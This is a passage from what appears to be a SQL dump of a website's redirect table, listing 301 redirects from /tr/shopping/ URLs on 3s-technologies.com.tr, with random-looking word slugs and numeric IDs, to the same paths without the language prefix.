00:00:00',301),(69767,'https://3s-technologies.com.tr/tr/shopping/symbiotic/2489696254.html',NULL,'https://3s-technologies.com.tr/shopping/symbiotic/2489696254.html','',1,0,'2026-06-11 01:26:19','0000-00-00 00:00:00',301),(69768,'https://3s-technologies.com.tr/tr/shopping/pistillody/1646405859.html',NULL,'https://3s-technologies.com.tr/shopping/pistillody/1646405859.html','',1,0,'2026-06-11 01:26:22','0000-00-00 00:00:00',301),(69769,'https://3s-technologies.com.tr/tr/shopping/porichthys/2696401534.html',NULL,'https://3s-technologies.com.tr/shopping/porichthys/2696401534.html','',1,0,'2026-06-11 01:26:25','0000-00-00 00:00:00',301),(69770,'https://3s-technologies.com.tr/tr/shopping/eranthis/926723425.html',NULL,'https://3s-technologies.com.tr/shopping/eranthis/926723425.html','',1,0,'2026-06-11 01:26:28','0000-00-00 00:00:00',301),(69771,'https://3s-technologies.com.tr/tr/shopping/southwestwardly/2179200746.html',NULL,'https://3s-technologies.com.tr/shopping/southwestwardly/2179200746.html','',1,0,'2026-06-11 01:26:31','0000-00-00 00:00:00',301),(69772,'https://3s-technologies.com.tr/tr/shopping/atoned/2893360364.html',NULL,'https://3s-technologies.com.tr/shopping/atoned/2893360364.html','',1,0,'2026-06-11 01:26:34','0000-00-00 00:00:00',301),(69773,'https://3s-technologies.com.tr/tr/shopping/auriculoventricular/2044772024.html',NULL,'https://3s-technologies.com.tr/shopping/auriculoventricular/2044772024.html','',1,0,'2026-06-11 01:26:37','0000-00-00 00:00:00',301),(69774,'https://3s-technologies.com.tr/tr/shopping/photoglyphic/2779582010.html',NULL,'https://3s-technologies.com.tr/shopping/photoglyphic/2779582010.html','',1,0,'2026-06-11 01:26:40','0000-00-00 00:00:00',301),(69775,'https://3s-technologies.com.tr/tr/shopping/alcaldia/3496997862.html',NULL,'https://3s-technologies.com.tr/shopping/alcaldia/3496997862.html','',1,0,'2026-06-11 01:26:43','0000-00-00 00:00:00',301),(69776,'https://3s-technologies.com.tr/tr/shopping/circumflexion/2523231139.html',NULL,'https://3s-technologies.com.tr/shopping/circumflexion/2523231139.html','',1,0,'2026-06-11 01:26:46','0000-00-00 00:00:00',301),(69777,'https://3s-technologies.com.tr/tr/shopping/economise/3699567115.html',NULL,'https://3s-technologies.com.tr/shopping/economise/3699567115.html','',1,0,'2026-06-11 01:26:49','0000-00-00 00:00:00',301),(69778,'https://3s-technologies.com.tr/tr/shopping/heterocarpism/1168375169.html',NULL,'https://3s-technologies.com.tr/shopping/heterocarpism/1168375169.html','',1,0,'2026-06-11 01:26:52','0000-00-00 00:00:00',301),(69779,'https://3s-technologies.com.tr/tr/shopping/supparasitation/1224751215.html',NULL,'https://3s-technologies.com.tr/shopping/supparasitation/1224751215.html','',1,0,'2026-06-11 01:26:55','0000-00-00 00:00:00',301),(69780,'https://3s-technologies.com.tr/tr/shopping/germanica/1485782919.html',NULL,'https://3s-technologies.com.tr/shopping/germanica/1485782919.html','',1,0,'2026-06-11 01:26:58','0000-00-00 00:00:00',301),(69781,'https://3s-technologies.com.tr/tr/shopping/haemopsis/1248542652.html',NULL,'https://3s-technologies.com.tr/shopping/haemopsis/1248542652.html','',1,0,'2026-06-11 01:27:01','0000-00-00 00:00:00',301),(69782,'https://3s-technologies.com.tr/tr/shopping/siliciureted/465708219.html',NULL,'https://3s-technologies.com.tr/shopping/siliciureted/465708219.html','',1,0,'2026-06-11 01:27:04','0000-00-00 00:00:00',301),(69783,'https://3s-technologies.com.tr/tr/shopping/trichinosis/3948504354.html',NULL,'https://3s-technologies.com.tr/shopping/trichinosis/3948504354.html','',1,0,'2026-06-11 01:27:07','0000-00-00 00:00:00',301),(69784,'https://3s-technologies.com.tr/tr/shopping/anachronous/1614485438.html',NULL,'https://3s-technologies.com.tr/shopping/anachronous/1614485438.html','',1,0,'2026-06-11 01:27:10','0000-00-00 00:00:00',301),(69785,'https://3s-technologies.com.tr/tr/shopping/monopneumonia/2076056965.html',NULL,'https://3s-technologies.com.tr/shopping/monopneumonia/2076056965.html','',1,0,'2026-06-11 01:27:13','0000-00-00 00:00:00',301),(69786,'https://3s-technologies.com.tr/tr/shopping/stomatopoda/2031968882.html',NULL,'https://3s-technologies.com.tr/shopping/stomatopoda/2031968882.html','',1,0,'2026-06-11 01:27:16','0000-00-00 00:00:00',301),(69787,'https://3s-technologies.com.tr/tr/shopping/mycology/4186570597.html',NULL,'https://3s-technologies.com.tr/shopping/mycology/4186570597.html','',1,0,'2026-06-11 01:27:19','0000-00-00 00:00:00',301),(69788,'https://3s-technologies.com.tr/tr/shopping/unaccountableness/1113427605.html',NULL,'https://3s-technologies.com.tr/shopping/unaccountableness/1113427605.html','',1,0,'2026-06-11 01:27:24','0000-00-00 00:00:00',301),(69789,'https://3s-technologies.com.tr/tr/shopping/disdainous/1299381914.html',NULL,'https://3s-technologies.com.tr/shopping/disdainous/1299381914.html','',1,0,'2026-06-11 01:27:26','0000-00-00 00:00:00',301),(69790,'https://3s-technologies.com.tr/tr/shopping/stateswoman/1481194131.html',NULL,'https://3s-technologies.com.tr/shopping/stateswoman/1481194131.html','',1,0,'2026-06-11 01:27:29','0000-00-00 00:00:00',301),(69791,'https://3s-technologies.com.tr/tr/shopping/schoolgirl/3730773903.html',NULL,'https://3s-technologies.com.tr/shopping/schoolgirl/3730773903.html','',1,0,'2026-06-11 01:27:32','0000-00-00 00:00:00',301),(69792,'https://3s-technologies.com.tr/tr/shopping/tubicole/2359170011.html',NULL,'https://3s-technologies.com.tr/shopping/tubicole/2359170011.html','',1,0,'2026-06-11 01:27:35','0000-00-00 00:00:00',301),(69793,'https://3s-technologies.com.tr/tr/shopping/brazilwoodbrazil/4040028046.html',NULL,'https://3s-technologies.com.tr/shopping/brazilwoodbrazil/4040028046.html','',1,0,'2026-06-11 01:27:38','0000-00-00 00:00:00',301),(69794,'https://3s-technologies.com.tr/tr/shopping/malevolence/2098951115.html',NULL,'https://3s-technologies.com.tr/shopping/malevolence/2098951115.html','',1,0,'2026-06-11 01:27:41','0000-00-00 00:00:00',301),(69795,'https://3s-technologies.com.tr/tr/shopping/adultonset/1167163070.html',NULL,'https://3s-technologies.com.tr/shopping/adultonset/1167163070.html','',1,0,'2026-06-11 01:27:44','0000-00-00 00:00:00',301),(69796,'https://3s-technologies.com.tr/tr/shopping/daywoman/3935880961.html',NULL,'https://3s-technologies.com.tr/shopping/daywoman/3935880961.html','',1,0,'2026-06-11 01:27:47','0000-00-00 00:00:00',301),(69797,'https://3s-technologies.com.tr/tr/shopping/homoplasmy/1056518071.html',NULL,'https://3s-technologies.com.tr/shopping/homoplasmy/1056518071.html','',1,0,'2026-06-11 01:27:50','0000-00-00 00:00:00',301),(69798,'https://3s-technologies.com.tr/tr/shopping/horticulturist/2554123147.html',NULL,'https://3s-technologies.com.tr/shopping/horticulturist/2554123147.html','',1,0,'2026-06-11 01:27:53','0000-00-00 00:00:00',301),(69799,'https://3s-technologies.com.tr/tr/shopping/polyneme/2167789468.html',NULL,'https://3s-technologies.com.tr/shopping/polyneme/2167789468.html','',1,0,'2026-06-11 01:27:56','0000-00-00 00:00:00',301),(69800,'https://3s-technologies.com.tr/tr/shopping/eternalist/3358584295.html',NULL,'https://3s-technologies.com.tr/shopping/eternalist/3358584295.html','',1,0,'2026-06-11 01:27:59','0000-00-00 00:00:00',301),(69801,'https://3s-technologies.com.tr/tr/shopping/daguerrean/1907570572.html',NULL,'https://3s-technologies.com.tr/shopping/daguerrean/1907570572.html','',1,0,'2026-06-11 01:28:02','0000-00-00 00:00:00',301),(69802,'https://3s-technologies.com.tr/tr/shopping/myxomatosis/3236918633.html',NULL,'https://3s-technologies.com.tr/shopping/myxomatosis/3236918633.html','',1,0,'2026-06-11 01:28:05','0000-00-00 00:00:00',301),(69803,'https://3s-technologies.com.tr/tr/shopping/selfaggrandizement/3415303500.html',NULL,'https://3s-technologies.com.tr/shopping/selfaggrandizement/3415303500.html','',1,0,'2026-06-11 01:28:08','0000-00-00 00:00:00',301),(69804,'https://3s-technologies.com.tr/tr/shopping/patriarchate/1799623651.html',NULL,'https://3s-technologies.com.tr/shopping/patriarchate/1799623651.html','',1,0,'2026-06-11 01:28:11','0000-00-00 00:00:00',301),(69805,'https://3s-technologies.com.tr/tr/shopping/supraoesophageal/1648492296.html',NULL,'https://3s-technologies.com.tr/shopping/supraoesophageal/1648492296.html','',1,0,'2026-06-11 01:28:14','0000-00-00 00:00:00',301),(69806,'https://3s-technologies.com.tr/tr/shopping/trumpetshaped/2019895135.html',NULL,'https://3s-technologies.com.tr/shopping/trumpetshaped/2019895135.html','',1,0,'2026-06-11 01:28:17','0000-00-00 00:00:00',301),(69807,'https://3s-technologies.com.tr/tr/shopping/earthdrake/4188994811.html',NULL,'https://3s-technologies.com.tr/shopping/earthdrake/4188994811.html','',1,0,'2026-06-11 01:28:20','0000-00-00 00:00:00',301),(69808,'https://3s-technologies.com.tr/tr/shopping/hyetology/4232784195.html',NULL,'https://3s-technologies.com.tr/shopping/hyetology/4232784195.html','',1,0,'2026-06-11 01:28:23','0000-00-00 00:00:00',301),(69809,'https://3s-technologies.com.tr/tr/shopping/gymnoglossa/1756275694.html',NULL,'https://3s-technologies.com.tr/shopping/gymnoglossa/1756275694.html','',1,0,'2026-06-11 01:28:26','0000-00-00 00:00:00',301),(69810,'https://3s-technologies.com.tr/tr/shopping/recrudesce/3119865630.html',NULL,'https://3s-technologies.com.tr/shopping/recrudesce/3119865630.html','',1,0,'2026-06-11 01:28:29','0000-00-00 00:00:00',301),(69811,'https://3s-technologies.com.tr/tr/shopping/eurotiales/541556421.html',NULL,'https://3s-technologies.com.tr/shopping/eurotiales/541556421.html','',1,0,'2026-06-11 01:28:32','0000-00-00 00:00:00',301),(69812,'https://3s-technologies.com.tr/tr/shopping/drysalter/3536805623.html',NULL,'https://3s-technologies.com.tr/shopping/drysalter/3536805623.html','',1,0,'2026-06-11 01:28:35','0000-00-00 00:00:00',301),(69813,'https://3s-technologies.com.tr/tr/shopping/tiliaceum/3375495739.html',NULL,'https://3s-technologies.com.tr/shopping/tiliaceum/3375495739.html','',1,0,'2026-06-11 01:28:38','0000-00-00 00:00:00',301),(69814,'https://3s-technologies.com.tr/tr/shopping/portemonnaie/2304990920.html',NULL,'https://3s-technologies.com.tr/shopping/portemonnaie/2304990920.html','',1,0,'2026-06-11 01:28:41','0000-00-00 00:00:00',301),(69815,'https://3s-technologies.com.tr/tr/shopping/porcellana/3466105886.html',NULL,'https://3s-technologies.com.tr/shopping/porcellana/3466105886.html','',1,0,'2026-06-11 01:28:44','0000-00-00 00:00:00',301),(69816,'https://3s-technologies.com.tr/tr/shopping/circumscissile/2216167640.html',NULL,'https://3s-technologies.com.tr/shopping/circumscissile/2216167640.html','',1,0,'2026-06-11 01:28:47','0000-00-00 00:00:00',301),(69817,'https://3s-technologies.com.tr/tr/shopping/synthesist/687146513.html',NULL,'https://3s-technologies.com.tr/shopping/synthesist/687146513.html','',1,0,'2026-06-11 01:28:50','0000-00-00 00:00:00',301),(69818,'https://3s-technologies.com.tr/tr/shopping/intervener/4112330632.html',NULL,'https://3s-technologies.com.tr/shopping/intervener/4112330632.html','',1,0,'2026-06-11 01:28:53','0000-00-00 00:00:00',301),(69819,'https://3s-technologies.com.tr/tr/shopping/mykiss/1265934582.html',NULL,'https://3s-technologies.com.tr/shopping/mykiss/1265934582.html','',1,0,'2026-06-11 01:28:56','0000-00-00 00:00:00',301),(69820,'https://3s-technologies.com.tr/tr/shopping/quamassia/3426298125.html',NULL,'https://3s-technologies.com.tr/shopping/quamassia/3426298125.html','',1,0,'2026-06-11 01:28:59','0000-00-00 00:00:00',301),(69821,'https://3s-technologies.com.tr/tr/shopping/geotrupes/2915571379.html',NULL,'https://3s-technologies.com.tr/shopping/geotrupes/2915571379.html','',1,0,'2026-06-11 01:29:02','0000-00-00 00:00:00',301),(69822,'https://3s-technologies.com.tr/tr/shopping/counsellorship/782508971.html',NULL,'https://3s-technologies.com.tr/shopping/counsellorship/782508971.html','',1,0,'2026-06-11 01:29:05','0000-00-00 00:00:00',301),(69823,'https://3s-technologies.com.tr/tr/shopping/bullockseye/1800835750.html',NULL,'https://3s-technologies.com.tr/shopping/bullockseye/1800835750.html','',1,0,'2026-06-11 01:29:08','0000-00-00 00:00:00',301),(69824,'https://3s-technologies.com.tr/tr/shopping/churchgoer/1100661355.html',NULL,'https://3s-technologies.com.tr/shopping/churchgoer/1100661355.html','',1,0,'2026-06-11 01:29:11','0000-00-00 00:00:00',301),(69825,'https://3s-technologies.com.tr/tr/shopping/assertion/1015144224.html',NULL,'https://3s-technologies.com.tr/shopping/assertion/1015144224.html','',1,0,'2026-06-11 01:38:20','0000-00-00 00:00:00',301),(69826,'https://3s-technologies.com.tr/tr/shopping/commenting/2315797280.html',NULL,'https://3s-technologies.com.tr/shopping/commenting/2315797280.html','',1,0,'2026-06-11 01:38:22','0000-00-00 00:00:00',301),(69827,'https://3s-technologies.com.tr/tr/shopping/grayhaired/891150449.html',NULL,'https://3s-technologies.com.tr/shopping/grayhaired/891150449.html','',1,0,'2026-06-11 01:38:25','0000-00-00 00:00:00',301),(69828,'https://3s-technologies.com.tr/tr/shopping/practicably/3330974597.html',NULL,'https://3s-technologies.com.tr/shopping/practicably/3330974597.html','',1,0,'2026-06-11 01:38:29','0000-00-00 00:00:00',301),(69829,'https://3s-technologies.com.tr/tr/shopping/figuring/249677998.html',NULL,'https://3s-technologies.com.tr/shopping/figuring/249677998.html','',1,0,'2026-06-11 01:38:31','0000-00-00 00:00:00',301),(69830,'https://3s-technologies.com.tr/tr/shopping/elementality/1490440835.html',NULL,'https://3s-technologies.com.tr/shopping/elementality/1490440835.html','',1,0,'2026-06-11 01:38:35','0000-00-00 00:00:00',301),(69831,'https://3s-technologies.com.tr/tr/shopping/repaster/2762739726.html',NULL,'https://3s-technologies.com.tr/shopping/repaster/2762739726.html','',1,0,'2026-06-11 01:39:12','0000-00-00 00:00:00',301),(69832,'https://3s-technologies.com.tr/tr/shopping/tryst/4124954025.html',NULL,'https://3s-technologies.com.tr/shopping/tryst/4124954025.html','',1,0,'2026-06-11 01:39:15','0000-00-00 00:00:00',301),(69833,'https://3s-technologies.com.tr/tr/shopping/prosaically/1370822651.html',NULL,'https://3s-technologies.com.tr/shopping/prosaically/1370822651.html','',1,0,'2026-06-11 01:39:18','0000-00-00 00:00:00',301),(69834,'https://3s-technologies.com.tr/tr/shopping/rubywood/3336939023.html',NULL,'https://3s-technologies.com.tr/shopping/rubywood/3336939023.html','',1,0,'2026-06-11 01:39:21','0000-00-00 00:00:00',301),(69835,'https://3s-technologies.com.tr/tr/shopping/externalization/2990206970.html',NULL,'https://3s-technologies.com.tr/shopping/externalization/2990206970.html','',1,0,'2026-06-11 01:39:24','0000-00-00 00:00:00',301),(69836,'https://3s-technologies.com.tr/tr/shopping/avolation/599952001.html',NULL,'https://3s-technologies.com.tr/shopping/avolation/599952001.html','',1,0,'2026-06-11 01:39:27','0000-00-00 00:00:00',301),(69837,'https://3s-technologies.com.tr/tr/shopping/synonymizing/168869660.html',NULL,'https://3s-technologies.com.tr/shopping/synonymizing/168869660.html','',1,0,'2026-06-11 01:39:35','0000-00-00 00:00:00',301),(69838,'https://3s-technologies.com.tr/tr/shopping/intentation/22768504.html',NULL,'https://3s-technologies.com.tr/shopping/intentation/22768504.html','',1,0,'2026-06-11 01:39:37','0000-00-00 00:00:00',301),(69839,'https://3s-technologies.com.tr/tr/shopping/straighting/2965675423.html',NULL,'https://3s-technologies.com.tr/shopping/straighting/2965675423.html','',1,0,'2026-06-11 01:39:40','0000-00-00 00:00:00',301),(69840,'https://3s-technologies.com.tr/tr/shopping/interdigital/830630212.html',NULL,'https://3s-technologies.com.tr/shopping/interdigital/830630212.html','',1,0,'2026-06-11 01:39:43','0000-00-00 00:00:00',301),(69841,'https://3s-technologies.com.tr/tr/shopping/compressor/2350569864.html',NULL,'https://3s-technologies.com.tr/shopping/compressor/2350569864.html','',1,0,'2026-06-11 01:39:46','0000-00-00 00:00:00',301),(69842,'https://3s-technologies.com.tr/tr/shopping/emulable/111100908.html',NULL,'https://3s-technologies.com.tr/shopping/emulable/111100908.html','',1,0,'2026-06-11 01:39:49','0000-00-00 00:00:00',301),(69843,'https://3s-technologies.com.tr/tr/shopping/foreknowable/704982927.html',NULL,'https://3s-technologies.com.tr/shopping/foreknowable/704982927.html','',1,0,'2026-06-11 01:40:17','0000-00-00 00:00:00',301),(69844,'https://3s-technologies.com.tr/tr/shopping/embossing/1672880986.html',NULL,'https://3s-technologies.com.tr/shopping/embossing/1672880986.html','',1,0,'2026-06-11 01:40:19','0000-00-00 00:00:00',301),(69845,'https://3s-technologies.com.tr/tr/shopping/overdraft/3304161316.html',NULL,'https://3s-technologies.com.tr/shopping/overdraft/3304161316.html','',1,0,'2026-06-11 01:40:22','0000-00-00 00:00:00',301),(69846,'https://3s-technologies.com.tr/tr/shopping/odeon/14526351.html',NULL,'https://3s-technologies.com.tr/shopping/odeon/14526351.html','',1,0,'2026-06-11 01:40:25','0000-00-00 00:00:00',301),(69847,'https://3s-technologies.com.tr/tr/shopping/observingly/644001009.html',NULL,'https://3s-technologies.com.tr/shopping/observingly/644001009.html','',1,0,'2026-06-11 01:40:28','0000-00-00 00:00:00',301),(69848,'https://3s-technologies.com.tr/tr/shopping/remotely/3101647708.html',NULL,'https://3s-technologies.com.tr/shopping/remotely/3101647708.html','',1,0,'2026-06-11 01:40:31','0000-00-00 00:00:00',301),(69849,'https://3s-technologies.com.tr/tr/shopping/gallingly/2830898137.html',NULL,'https://3s-technologies.com.tr/shopping/gallingly/2830898137.html','',1,0,'2026-06-11 01:40:35','0000-00-00 00:00:00',301),(69850,'https://3s-technologies.com.tr/tr/shopping/exactingly/2253176173.html',NULL,'https://3s-technologies.com.tr/shopping/exactingly/2253176173.html','',1,0,'2026-06-11 01:40:37','0000-00-00 00:00:00',301),(69851,'https://3s-technologies.com.tr/tr/shopping/locoing/501579733.html',NULL,'https://3s-technologies.com.tr/shopping/locoing/501579733.html','',1,0,'2026-06-11 01:40:40','0000-00-00 00:00:00',301),(69852,'https://3s-technologies.com.tr/tr/shopping/visioning/362067236.html',NULL,'https://3s-technologies.com.tr/shopping/visioning/362067236.html','',1,0,'2026-06-11 01:40:43','0000-00-00 00:00:00',301),(69853,'https://3s-technologies.com.tr/tr/shopping/exscribe/2286396262.html',NULL,'https://3s-technologies.com.tr/shopping/exscribe/2286396262.html','',1,0,'2026-06-11 01:40:48','0000-00-00 00:00:00',301),(69854,'https://3s-technologies.com.tr/tr/shopping/undermaster/415066609.html',NULL,'https://3s-technologies.com.tr/shopping/undermaster/415066609.html','',1,0,'2026-06-11 01:40:50','0000-00-00 00:00:00',301),(69855,'https://3s-technologies.com.tr/tr/shopping/vacuous/2564322326.html',NULL,'https://3s-technologies.com.tr/shopping/vacuous/2564322326.html','',1,0,'2026-06-11 01:40:53','0000-00-00 00:00:00',301),(69856,'https://3s-technologies.com.tr/tr/shopping/nonlethal/1153697443.html',NULL,'https://3s-technologies.com.tr/shopping/nonlethal/1153697443.html','',1,0,'2026-06-11 01:40:56','0000-00-00 00:00:00',301),(69857,'https://3s-technologies.com.tr/tr/shopping/rhodeoretin/453662271.html',NULL,'https://3s-technologies.com.tr/shopping/rhodeoretin/453662271.html','',1,0,'2026-06-11 01:40:59','0000-00-00 00:00:00',301),(69858,'https://3s-technologies.com.tr/tr/shopping/destroy/632283303.html',NULL,'https://3s-technologies.com.tr/shopping/destroy/632283303.html','',1,0,'2026-06-11 01:41:02','0000-00-00 00:00:00',301),(69859,'https://3s-technologies.com.tr/tr/shopping/outfaced/975615338.html',NULL,'https://3s-technologies.com.tr/shopping/outfaced/975615338.html','',1,0,'2026-06-11 01:41:10','0000-00-00 00:00:00',301),(69860,'https://3s-technologies.com.tr/tr/shopping/ailurus/3560587180.html',NULL,'https://3s-technologies.com.tr/shopping/ailurus/3560587180.html','',1,0,'2026-06-11 01:41:12','0000-00-00 00:00:00',301),(69861,'https://3s-technologies.com.tr/tr/shopping/changeup/1487736002.html',NULL,'https://3s-technologies.com.tr/shopping/changeup/1487736002.html','',1,0,'2026-06-11 01:41:15','0000-00-00 00:00:00',301),(69862,'https://3s-technologies.com.tr/tr/shopping/uncared/1194600191.html',NULL,'https://3s-technologies.com.tr/shopping/uncared/1194600191.html','',1,0,'2026-06-11 01:41:18','0000-00-00 00:00:00',301),(69863,'https://3s-technologies.com.tr/tr/shopping/testator/1361481552.html',NULL,'https://3s-technologies.com.tr/shopping/testator/1361481552.html','',1,0,'2026-06-11 01:41:21','0000-00-00 00:00:00',301),(69864,'https://3s-technologies.com.tr/tr/shopping/coordinately/593035100.html',NULL,'https://3s-technologies.com.tr/shopping/coordinately/593035100.html','',1,0,'2026-06-11 01:41:24','0000-00-00 00:00:00',301),(69865,'https://3s-technologies.com.tr/tr/shopping/collapsed/2906858095.html',NULL,'https://3s-technologies.com.tr/shopping/collapsed/2906858095.html','',1,0,'2026-06-11 01:41:51','0000-00-00 00:00:00',301),(69866,'https://3s-technologies.com.tr/tr/shopping/connoting/853949692.html',NULL,'https://3s-technologies.com.tr/shopping/connoting/853949692.html','',1,0,'2026-06-11 01:41:54','0000-00-00 00:00:00',301),(69867,'https://3s-technologies.com.tr/tr/shopping/accustomedness/3590677106.html',NULL,'https://3s-technologies.com.tr/shopping/accustomedness/3590677106.html','',1,0,'2026-06-11 01:41:57','0000-00-00 00:00:00',301),(69868,'https://3s-technologies.com.tr/tr/shopping/plundering/3904107805.html',NULL,'https://3s-technologies.com.tr/shopping/plundering/3904107805.html','',1,0,'2026-06-11 01:42:00','0000-00-00 00:00:00',301),(69869,'https://3s-technologies.com.tr/tr/shopping/goblets/2791877145.html',NULL,'https://3s-technologies.com.tr/shopping/goblets/2791877145.html','',1,0,'2026-06-11 01:42:03','0000-00-00 00:00:00',301),(69870,'https://3s-technologies.com.tr/tr/shopping/compulsive/1974486209.html',NULL,'https://3s-technologies.com.tr/shopping/compulsive/1974486209.html','',1,0,'2026-06-11 01:42:09','0000-00-00 00:00:00',301),(69871,'https://3s-technologies.com.tr/tr/shopping/editress/1508024103.html',NULL,'https://3s-technologies.com.tr/shopping/editress/1508024103.html','',1,0,'2026-06-11 01:42:13','0000-00-00 00:00:00',301),(69872,'https://3s-technologies.com.tr/tr/shopping/unjoin/3578287560.html',NULL,'https://3s-technologies.com.tr/shopping/unjoin/3578287560.html','',1,0,'2026-06-11 01:42:16','0000-00-00 00:00:00',301),(69873,'https://3s-technologies.com.tr/tr/shopping/peerless/710783798.html',NULL,'https://3s-technologies.com.tr/shopping/peerless/710783798.html','',1,0,'2026-06-11 01:42:19','0000-00-00 00:00:00',301),(69874,'https://3s-technologies.com.tr/tr/shopping/exceptiousness/1767686988.html',NULL,'https://3s-technologies.com.tr/shopping/exceptiousness/1767686988.html','',1,0,'2026-06-11 01:42:22','0000-00-00 00:00:00',301),(69875,'https://3s-technologies.com.tr/tr/shopping/arrect/4189735763.html',NULL,'https://3s-technologies.com.tr/shopping/arrect/4189735763.html','',1,0,'2026-06-11 01:42:25','0000-00-00 00:00:00',301),(69876,'https://3s-technologies.com.tr/tr/shopping/interferant/30897520.html',NULL,'https://3s-technologies.com.tr/shopping/interferant/30897520.html','',1,0,'2026-06-11 01:42:30','0000-00-00 00:00:00',301),(69877,'https://3s-technologies.com.tr/tr/shopping/deictically/171293858.html',NULL,'https://3s-technologies.com.tr/shopping/deictically/171293858.html','',1,0,'2026-06-11 01:42:34','0000-00-00 00:00:00',301),(69878,'https://3s-technologies.com.tr/tr/shopping/variableness/3486971432.html',NULL,'https://3s-technologies.com.tr/shopping/variableness/3486971432.html','',1,0,'2026-06-11 01:42:37','0000-00-00 00:00:00',301),(69879,'https://3s-technologies.com.tr/tr/shopping/peevit/1170164697.html',NULL,'https://3s-technologies.com.tr/shopping/peevit/1170164697.html','',1,0,'2026-06-11 01:42:40','0000-00-00 00:00:00',301),(69880,'https://3s-technologies.com.tr/tr/shopping/cruddle/4808500.html',NULL,'https://3s-technologies.com.tr/shopping/cruddle/4808500.html','',1,0,'2026-06-11 01:42:43','0000-00-00 00:00:00',301),(69881,'https://3s-technologies.com.tr/tr/shopping/heremit/2861364815.html',NULL,'https://3s-technologies.com.tr/shopping/heremit/2861364815.html','',1,0,'2026-06-11 01:42:46','0000-00-00 00:00:00',301),(69882,'https://3s-technologies.com.tr/tr/shopping/impresting/4108482828.html',NULL,'https://3s-technologies.com.tr/shopping/impresting/4108482828.html','',1,0,'2026-06-11 01:42:52','0000-00-00 00:00:00',301),(69883,'https://3s-technologies.com.tr/tr/shopping/fireback/3234400040.html',NULL,'https://3s-technologies.com.tr/shopping/fireback/3234400040.html','',1,0,'2026-06-11 01:42:55','0000-00-00 00:00:00',301),(69884,'https://3s-technologies.com.tr/tr/shopping/celsius/3684089158.html',NULL,'https://3s-technologies.com.tr/shopping/celsius/3684089158.html','',1,0,'2026-06-11 01:42:57','0000-00-00 00:00:00',301),(69885,'https://3s-technologies.com.tr/tr/shopping/tangle/1321231377.html',NULL,'https://3s-technologies.com.tr/shopping/tangle/1321231377.html','',1,0,'2026-06-11 01:43:00','0000-00-00 00:00:00',301),(69886,'https://3s-technologies.com.tr/tr/shopping/domitable/838855313.html',NULL,'https://3s-technologies.com.tr/shopping/domitable/838855313.html','',1,0,'2026-06-11 01:43:04','0000-00-00 00:00:00',301),(69887,'https://3s-technologies.com.tr/tr/shopping/edifyingly/2596836466.html',NULL,'https://3s-technologies.com.tr/shopping/edifyingly/2596836466.html','',1,0,'2026-06-11 01:43:06','0000-00-00 00:00:00',301),(69888,'https://3s-technologies.com.tr/tr/shopping/origin/1847790332.html',NULL,'https://3s-technologies.com.tr/shopping/origin/1847790332.html','',1,0,'2026-06-11 01:43:11','0000-00-00 00:00:00',301),(69889,'https://3s-technologies.com.tr/tr/shopping/eloigned/3200663547.html',NULL,'https://3s-technologies.com.tr/shopping/eloigned/3200663547.html','',1,0,'2026-06-11 01:43:14','0000-00-00 00:00:00',301),(69890,'https://3s-technologies.com.tr/tr/shopping/passless/3134325355.html',NULL,'https://3s-technologies.com.tr/shopping/passless/3134325355.html','',1,0,'2026-06-11 01:43:16','0000-00-00 00:00:00',301),(69891,'https://3s-technologies.com.tr/tr/shopping/beeper/3294707048.html',NULL,'https://3s-technologies.com.tr/shopping/beeper/3294707048.html','',1,0,'2026-06-11 01:43:31','0000-00-00 00:00:00',301),(69892,'https://3s-technologies.com.tr/tr/shopping/globular/438126465.html',NULL,'https://3s-technologies.com.tr/shopping/globular/438126465.html','',1,0,'2026-06-11 01:43:33','0000-00-00 00:00:00',301),(69893,'https://3s-technologies.com.tr/tr/shopping/venenosum/2961069551.html',NULL,'https://3s-technologies.com.tr/shopping/venenosum/2961069551.html','',1,0,'2026-06-11 01:43:36','0000-00-00 00:00:00',301),(69894,'https://3s-technologies.com.tr/tr/shopping/bedbug/2726868180.html',NULL,'https://3s-technologies.com.tr/shopping/bedbug/2726868180.html','',1,0,'2026-06-11 01:43:39','0000-00-00 00:00:00',301),(69895,'https://3s-technologies.com.tr/tr/shopping/jeopardizing/1175804808.html',NULL,'https://3s-technologies.com.tr/shopping/jeopardizing/1175804808.html','',1,0,'2026-06-11 01:43:42','0000-00-00 00:00:00',301),(69896,'https://3s-technologies.com.tr/tr/shopping/receiver/3007907366.html',NULL,'https://3s-technologies.com.tr/shopping/receiver/3007907366.html','',1,0,'2026-06-11 01:43:45','0000-00-00 00:00:00',301),(69897,'https://3s-technologies.com.tr/tr/shopping/crape/3703589535.html',NULL,'https://3s-technologies.com.tr/shopping/crape/3703589535.html','',1,0,'2026-06-11 01:43:52','0000-00-00 00:00:00',301),(69898,'https://3s-technologies.com.tr/tr/shopping/ceiling/373508234.html',NULL,'https://3s-technologies.com.tr/shopping/ceiling/373508234.html','',1,0,'2026-06-11 01:43:54','0000-00-00 00:00:00',301),(69899,'https://3s-technologies.com.tr/tr/shopping/periphrastically/2950302137.html',NULL,'https://3s-technologies.com.tr/shopping/periphrastically/2950302137.html','',1,0,'2026-06-11 01:43:58','0000-00-00 00:00:00',301),(69900,'https://3s-technologies.com.tr/tr/shopping/insular/136355536.html',NULL,'https://3s-technologies.com.tr/shopping/insular/136355536.html','',1,0,'2026-06-11 01:44:00','0000-00-00 00:00:00',301),(69901,'https://3s-technologies.com.tr/tr/shopping/arable/387551290.html',NULL,'https://3s-technologies.com.tr/shopping/arable/387551290.html','',1,0,'2026-06-11 01:44:04','0000-00-00 00:00:00',301),(69902,'https://3s-technologies.com.tr/tr/shopping/faecula/3752901918.html',NULL,'https://3s-technologies.com.tr/shopping/faecula/3752901918.html','',1,0,'2026-06-11 01:44:06','0000-00-00 00:00:00',301),(69903,'https://3s-technologies.com.tr/tr/shopping/roughgrained/562421999.html',NULL,'https://3s-technologies.com.tr/shopping/roughgrained/562421999.html','',1,0,'2026-06-11 01:44:13','0000-00-00 00:00:00',301),(69904,'https://3s-technologies.com.tr/tr/shopping/backjoint/795132364.html',NULL,'https://3s-technologies.com.tr/shopping/backjoint/795132364.html','',1,0,'2026-06-11 01:44:16','0000-00-00 00:00:00',301),(69905,'https://3s-technologies.com.tr/tr/shopping/addicted/423195593.html',NULL,'https://3s-technologies.com.tr/shopping/addicted/423195593.html','',1,0,'2026-06-11 01:44:19','0000-00-00 00:00:00',301),(69906,'https://3s-technologies.com.tr/tr/shopping/pectinately/3012496154.html',NULL,'https://3s-technologies.com.tr/shopping/pectinately/3012496154.html','',1,0,'2026-06-11 01:44:22','0000-00-00 